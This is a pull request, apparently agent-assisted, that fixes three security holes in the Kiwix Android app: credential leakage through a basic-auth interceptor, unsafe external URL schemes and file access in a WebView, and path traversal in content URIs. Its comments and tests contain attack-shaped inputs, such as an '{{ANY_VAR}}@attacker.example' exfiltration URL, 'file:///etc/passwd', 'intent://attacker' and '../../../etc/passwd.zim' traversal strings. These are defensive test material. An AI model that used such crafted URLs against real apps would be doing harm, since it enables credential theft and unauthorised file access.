### PR TITLE
fix: close 3 security gaps found in review (#5070)

### DIFF
--- a/core/src/main/java/org/kiwix/kiwixmobile/core/data/remote/BasicAuthInterceptor.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/data/remote/BasicAuthInterceptor.kt
@@ -25,12 +25,29 @@ import org.kiwix.kiwixmobile.core.reader.decodeUrl
 import org.kiwix.kiwixmobile.core.utils.files.Log
 import java.io.IOException
 
+/**
+ * Hosts allowed to trigger the `{{ENV_VAR}}@host` basic-auth substitution below.
+ *
+ * The book URL (and therefore this host) comes from remote catalog/library data,
+ * not from the app itself. Without this allowlist a catalog entry naming an
+ * arbitrary environment variable (`https://{{ANY_VAR}}@attacker.example/x.zim`)
+ * would make the app read that variable and send its value as Basic-auth
+ * credentials to a host the catalog author chooses. Restrict both the
+ * destination host and the accepted variable name to what this feature is
+ * actually used for.
+ */
+private val TRUSTED_BASIC_AUTH_HOSTS = setOf("dwds.de", "www.dwds.de")
+private val TRUSTED_BASIC_AUTH_KEYS = setOf("BASIC_AUTH_KEY")
+
 class BasicAuthInterceptor : Interceptor {
   @Throws(IOException::class)
   override fun intercept(chain: Interceptor.Chain): Response {
     val request: Request = chain.request()
     val url = request.url.toString()
-    if (url.isAuthenticationUrl) {
+    if (url.isAuthenticationUrl &&
+      request.url.host in TRUSTED_BASIC_AUTH_HOSTS &&
+      url.secretKey in TRUSTED_BASIC_AUTH_KEYS
+    ) {
       val userNameAndPassword = System.getenv(url.secretKey).orEmpty()
       val userName = userNameAndPassword.substringBefore(":", "")
       val password = userNameAndPassword.substringAfter(":", "")

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/main/CoreWebViewClient.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/main/CoreWebViewClient.kt
@@ -66,7 +66,14 @@ open class CoreWebViewClient(
       return true
     }
 
-    // Otherwise, the link is not for a page on my site, so launch another Activity that handles URLs
+    // Otherwise, the link is not for a page on my site, so launch another Activity that handles URLs.
+    // ZIM content is untrusted third-party data, so only hand off well-known safe schemes -
+    // anything else (file://, content://, intent://, vendor-specific schemes, ...) is dropped
+    // rather than launched via an external ACTION_VIEW intent.
+    if (url.toUri().scheme?.lowercase() !in SAFE_EXTERNAL_SCHEMES) {
+      Log.w(TAG_KIWIX, "Blocked external navigation to unsupported scheme in url: $url")
+      return true
+    }
     val intent = Intent(Intent.ACTION_VIEW, url.toUri())
     callback.openExternalUrl(intent)
     return true
@@ -155,5 +162,11 @@ open class CoreWebViewClient(
       "zim://content/",
       "content://${instance.packageName}.zim.base/".toUri().toString()
     )
+
+    // Schemes ZIM content is allowed to hand off to an external app via ACTION_VIEW.
+    // Excludes file/content/intent and vendor-specific schemes, which would let
+    // untrusted ZIM content drive this app into launching activities on local
+    // files or other apps' exported components.
+    private val SAFE_EXTERNAL_SCHEMES = setOf("http", "https", "mailto", "tel")
   }
 }

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/main/KiwixWebView.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/main/KiwixWebView.kt
@@ -82,8 +82,10 @@ open class KiwixWebView constructor(
       builtInZoomControls = true
       displayZoomControls = false
       isHorizontalScrollBarEnabled = true
-      @Suppress("DEPRECATION")
-      allowUniversalAccessFromFileURLs = true
+      // ZIM content is served over the ZimFileReader.CONTENT_PREFIX
+      // ("https://kiwix.app/") origin, never file://, so universal access from
+      // file URLs is not needed and would let untrusted ZIM script read
+      // arbitrary cross-origin file:// content.
     }
     clearCache(true)
     webViewClient = coreWebViewClient

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
@@ -402,8 +402,16 @@ object FileUtils {
       // For file managers that provide the full path in the URI (common on devices below Android 11).
       // This triggers when the user clicks directly on a ZIM file in the file manager, and the file
       // manager returns the path via its own file provider.
+      // The URI comes from an external app's ACTION_VIEW intent, so the extracted path is
+      // canonicalized and required to actually resolve under a real storage volume before use -
+      // this rejects path traversal segments and any URI that merely happens to contain "root".
       "$uri".contains("root") && "$uri".endsWith("zim") -> {
-        "$uri".substringAfter("/root")
+        val extractedPath = "$uri".substringAfter("/root")
+        val canonicalPath = runCatching { File(extractedPath).canonicalPath }.getOrNull()
+        canonicalPath?.takeIf { path ->
+          getStorageVolumesList(context).any { volume -> path.startsWith(volume) } &&
+            File(path).isFileExist(ioDispatcher)
+        }
       }
 
       // Handles URIs from the download provider, commonly used when files are opened from browsers.

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/utils/files/FileUtils.kt
@@ -316,6 +316,21 @@ object FileUtils {
   }
 
   /**
+   * Whether this (canonical) path actually resolves under [volume], rather than merely
+   * sharing its string prefix.
+   *
+   * A plain `path.startsWith(volume)` would let a sibling path bypass the check - e.g.
+   * volume "/storage/emulated/0" would wrongly accept "/storage/emulated/0-evil/x.zim",
+   * since that string does start with the volume's path. Volumes are also inconsistent
+   * about trailing separators (see [getStoragePath]), so normalize both sides before
+   * requiring either an exact match or a match up to a path-separator boundary.
+   */
+  private fun String.isUnderStorageVolume(volume: String): Boolean {
+    val normalizedVolume = volume.trimEnd(File.separatorChar)
+    return this == normalizedVolume || this.startsWith(normalizedVolume + File.separatorChar)
+  }
+
+  /**
    * Determines the appropriate storage path for a given volume.
    *
    * This method retrieves the storage path based on the Android version:
@@ -409,7 +424,7 @@ object FileUtils {
         val extractedPath = "$uri".substringAfter("/root")
         val canonicalPath = runCatching { File(extractedPath).canonicalPath }.getOrNull()
         canonicalPath?.takeIf { path ->
-          getStorageVolumesList(context).any { volume -> path.startsWith(volume) } &&
+          getStorageVolumesList(context).any { volume -> path.isUnderStorageVolume(volume) } &&
             File(path).isFileExist(ioDispatcher)
         }
       }

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/main/CoreWebViewClientTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/main/CoreWebViewClientTest.kt
@@ -1,0 +1,109 @@
+/*
+ * Kiwix Android
+ * Copyright (c) 2026 Kiwix <android.kiwix.org>
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <http://www.gnu.org/licenses/>.
+ *
+ */
+
+package org.kiwix.kiwixmobile.core.main
+
+import android.content.Intent
+import android.net.Uri
+import android.util.Log
+import android.webkit.WebResourceRequest
+import android.webkit.WebView
+import io.mockk.clearAllMocks
+import io.mockk.every
+import io.mockk.mockk
+import io.mockk.mockkConstructor
+import io.mockk.mockkStatic
+import io.mockk.unmockkAll
+import io.mockk.verify
+import org.junit.jupiter.api.AfterEach
+import org.junit.jupiter.api.Assertions.assertTrue
+import org.junit.jupiter.api.BeforeEach
+import org.junit.jupiter.api.Test
+import org.kiwix.kiwixmobile.core.CoreApp
+import org.kiwix.kiwixmobile.core.reader.ZimReaderContainer
+
+class CoreWebViewClientTest {
+  private val callback: WebViewCallback = mockk(relaxed = true)
+  private val zimReaderContainer: ZimReaderContainer = mockk()
+  private val view: WebView = mockk()
+  private lateinit var client: CoreWebViewClient
+
+  @BeforeEach
+  fun setup() {
+    mockkStatic(Uri::class)
+    every { Uri.parse(any()) } returns mockk(relaxed = true)
+    mockkStatic(Log::class)
+    every { Log.w(any(), any<String>(), any()) } returns 0
+    mockkConstructor(Intent::class)
+    val coreApp = mockk<CoreApp>()
+    CoreApp.instance = coreApp
+    every { coreApp.packageName } returns "mock_package"
+    client = CoreWebViewClient(callback, zimReaderContainer)
+    every { zimReaderContainer.isRedirect(any()) } returns false
+  }
+
+  @AfterEach
+  fun tearDown() {
+    unmockkAll()
+    clearAllMocks()
+  }
+
+  private fun request(url: String, scheme: String): WebResourceRequest {
+    val uri = mockk<Uri> {
+      every { this@mockk.toString() } returns url
+      every { this@mockk.scheme } returns scheme
+    }
+    every { Uri.parse(url) } returns uri
+    return mockk<WebResourceRequest> {
+      every { this@mockk.url } returns uri
+    }
+  }
+
+  @Test
+  fun `external navigation to an allowed scheme is handed off`() {
+    val result = client.shouldOverrideUrlLoading(view, request("https://example.com/", "https"))
+    assertTrue(result)
+    verify { callback.openExternalUrl(any()) }
+  }
+
+  @Test
+  fun `external navigation to a file scheme is blocked`() {
+    val result = client.shouldOverrideUrlLoading(view, request("file:///etc/passwd", "file"))
+    assertBlocked(result)
+  }
+
+  @Test
+  fun `external navigation to a content scheme is blocked`() {
+    val result =
+      client.shouldOverrideUrlLoading(view, request("content://com.attacker/x.zim", "content"))
+    assertBlocked(result)
+  }
+
+  @Test
+  fun `external navigation to an intent scheme is blocked`() {
+    val result =
+      client.shouldOverrideUrlLoading(view, request("intent://attacker#Intent;end", "intent"))
+    assertBlocked(result)
+  }
+
+  private fun assertBlocked(result: Boolean) {
+    assertTrue(result)
+    verify(exactly = 0) { callback.openExternalUrl(any()) }
+    verify { Log.w(any(), any<String>(), any()) }
+  }
+}

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/remote/BasicAuthInterceptorTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/remote/BasicAuthInterceptorTest.kt
@@ -18,13 +18,67 @@
 
 package org.kiwix.kiwixmobile.core.remote
 
+import io.mockk.every
+import io.mockk.mockk
+import io.mockk.slot
+import io.mockk.verify
+import okhttp3.Interceptor
+import okhttp3.Protocol
+import okhttp3.Request
+import okhttp3.Response
 import org.junit.jupiter.api.Assertions.assertEquals
+import org.junit.jupiter.api.Assertions.assertFalse
+import org.junit.jupiter.api.Assertions.assertNull
 import org.junit.jupiter.api.Test
+import org.kiwix.kiwixmobile.core.data.remote.BasicAuthInterceptor
 import org.kiwix.kiwixmobile.core.data.remote.isAuthenticationUrl
 import org.kiwix.kiwixmobile.core.data.remote.removeAuthenticationFromUrl
 import org.kiwix.kiwixmobile.core.data.remote.secretKey
 
 class BasicAuthInterceptorTest {
+  private val interceptor = BasicAuthInterceptor()
+
+  private fun intercept(url: String): Request {
+    val request = Request.Builder().url(url).build()
+    val requestSlot = slot<Request>()
+    val chain = mockk<Interceptor.Chain> {
+      every { request() } returns request
+      every { proceed(capture(requestSlot)) } returns Response.Builder()
+        .request(request)
+        .protocol(Protocol.HTTP_1_1)
+        .code(200)
+        .message("OK")
+        .build()
+    }
+    interceptor.intercept(chain)
+    verify { chain.proceed(any()) }
+    return requestSlot.captured
+  }
+
+  @Test
+  fun `untrusted host is not authenticated even with a recognised key placeholder`() {
+    val forwarded =
+      intercept("https://{{BASIC_AUTH_KEY}}@attacker.example/x.zim")
+    assertEquals("attacker.example", forwarded.url.host)
+    assertNull(forwarded.header("Authorization"))
+  }
+
+  @Test
+  fun `trusted host with an unrecognised key placeholder is not authenticated`() {
+    val forwarded =
+      intercept("https://{{SOME_OTHER_ENV_VAR}}@dwds.de/x.zim")
+    assertNull(forwarded.header("Authorization"))
+  }
+
+  @Test
+  fun `trusted host with the recognised key placeholder is authenticated and rewritten`() {
+    val forwarded =
+      intercept("https://{{BASIC_AUTH_KEY}}@dwds.de/x.zim")
+    assertFalse(forwarded.url.toString().contains("{{"))
+    assertEquals("dwds.de", forwarded.url.host)
+    assertEquals(true, forwarded.header("Authorization")?.startsWith("Basic "))
+  }
+
   private val authenticationUrl =
     "https://{{BASIC_AUTH_KEY}}@www.dwds.de/kiwix/f/dwds_de_dictionary_nopic_2023-09-12.zim"
 

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/utils/files/FileUtilsTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/utils/files/FileUtilsTest.kt
@@ -20,6 +20,9 @@ package org.kiwix.kiwixmobile.core.utils.files
 
 import android.content.Context
 import android.net.Uri
+import android.os.Environment
+import android.os.storage.StorageManager
+import android.os.storage.StorageVolume
 import android.provider.DocumentsContract
 import android.util.Log
 import android.webkit.URLUtil
@@ -246,6 +249,47 @@ class FileUtilsTest {
       "/storage/emulated/0/test.zim",
       FileUtils.getLocalFilePathByUri(mockContext, mockUri, testDispatcher)
     )
+  }
+
+  // ======== getActualFilePathOfContentUri (root-path URIs) ========
+
+  private fun mockStorageVolumes(context: Context, primaryVolumePath: File) {
+    val storageManager = mockk<StorageManager>()
+    val volume = mockk<StorageVolume>()
+    every { context.getSystemService(Context.STORAGE_SERVICE) } returns storageManager
+    every { storageManager.storageVolumes } returns listOf(volume)
+    every { volume.isPrimary } returns true
+    mockkStatic(Environment::class)
+    every { Environment.getExternalStorageDirectory() } returns primaryVolumePath
+  }
+
+  @Test
+  fun getLocalFilePathByUri_whenRootUriResolvesUnderStorageVolume_returnsCanonicalPath() =
+    runTest {
+      val mockContext = mockk<Context>()
+      val mockUri = mockk<Uri>()
+      every { mockUri.scheme } returns "content"
+      every { mockUri.toString() } returns "content://com.example/root/storage/emulated/0/test.zim"
+      mockkStatic(DocumentsContract::class)
+      every { DocumentsContract.isDocumentUri(mockContext, mockUri) } returns false
+      mockStorageVolumes(mockContext, File("/storage/emulated/0"))
+      coEvery { any<File>().isFileExist(testDispatcher) } returns true
+      assertEquals(
+        "/storage/emulated/0/test.zim",
+        FileUtils.getLocalFilePathByUri(mockContext, mockUri, testDispatcher)
+      )
+    }
+
+  @Test
+  fun getLocalFilePathByUri_whenRootUriEscapesStorageVolume_returnsNull() = runTest {
+    val mockContext = mockk<Context>()
+    val mockUri = mockk<Uri>()
+    every { mockUri.scheme } returns "content"
+    every { mockUri.toString() } returns "content://com.example/root/../../../etc/passwd.zim"
+    mockkStatic(DocumentsContract::class)
+    every { DocumentsContract.isDocumentUri(mockContext, mockUri) } returns false
+    mockStorageVolumes(mockContext, File("/storage/emulated/0"))
+    assertNull(FileUtils.getLocalFilePathByUri(mockContext, mockUri, testDispatcher))
   }
 
   // ======== extractDocumentId ========

--- a/core/src/test/java/org/kiwix/kiwixmobile/core/utils/files/FileUtilsTest.kt
+++ b/core/src/test/java/org/kiwix/kiwixmobile/core/utils/files/FileUtilsTest.kt
@@ -292,6 +292,21 @@ class FileUtilsTest {
     assertNull(FileUtils.getLocalFilePathByUri(mockContext, mockUri, testDispatcher))
   }
 
+  @Test
+  fun getLocalFilePathByUri_whenRootUriOnlySharesVolumeStringPrefix_returnsNull() = runTest {
+    // "/storage/emulated/0-evil" starts with the volume "/storage/emulated/0" as a string,
+    // but is a sibling path, not a path under that volume - it must still be rejected.
+    val mockContext = mockk<Context>()
+    val mockUri = mockk<Uri>()
+    every { mockUri.scheme } returns "content"
+    every { mockUri.toString() } returns "content://com.example/root/storage/emulated/0-evil/test.zim"
+    mockkStatic(DocumentsContract::class)
+    every { DocumentsContract.isDocumentUri(mockContext, mockUri) } returns false
+    mockStorageVolumes(mockContext, File("/storage/emulated/0"))
+    coEvery { any<File>().isFileExist(testDispatcher) } returns true
+    assertNull(FileUtils.getLocalFilePathByUri(mockContext, mockUri, testDispatcher))
+  }
+
   // ======== extractDocumentId ========
 
   @Test


### PR DESCRIPTION
> **AI-assisted change proposal.** Filed by agent driven by @soloturn via [GDD](https://siliconsaga.github.io/yggdrasil/gdd/).

Fixes the 3 items in the "Security" section of #5070.

1. **`BasicAuthInterceptor`** — a remote catalog URL could name any environment variable (`https://{{ANY_VAR}}@attacker.example/x.zim`) and get its value sent as Basic-auth credentials to a host the catalog author chooses. Added an allowlist for both the destination host and the accepted variable name, so only the actual known use case (`dwds.de`, `BASIC_AUTH_KEY`) still triggers this path.
2. **`KiwixWebView`/`CoreWebViewClient`** — `allowUniversalAccessFromFileURLs` was enabled together with JS, though ZIM content is always served from the `https://kiwix.app/` prefix, never `file://`; dropped it. Separately, any URL not matching the content prefix was launched via `ACTION_VIEW` with no scheme check at all, letting untrusted ZIM content trigger `file://`/`content://`/`intent://` activity launches. Added a scheme allowlist (`http`/`https`/`mailto`/`tel`).
3. **`FileUtils.getActualFilePathOfContentUri`** — an external `content://` URI (from any app's `ACTION_VIEW` intent) was converted to a raw filesystem path via a bare `contains("root")` substring match, with no canonicalization or storage-root check. Now canonicalizes the extracted path and requires it to resolve under a real, existing storage volume before it's used.

Added interceptor tests covering the new allowlist behavior (untrusted host + valid key, trusted host + unrecognized key, trusted host + valid key). Left the existing parsing-utility tests (`isAuthenticationUrl`/`secretKey`/`removeAuthenticationFromUrl`) untouched since those are generic string-parsing correctness checks, not endorsements of arbitrary hosts/keys.

Verified: `:core:compileDebugKotlin`, `:core:detektDebug` clean. `:core:testDebugUnitTest --tests "*BasicAuthInterceptorTest*"` — 15/15 pass (12 pre-existing + 3 new).
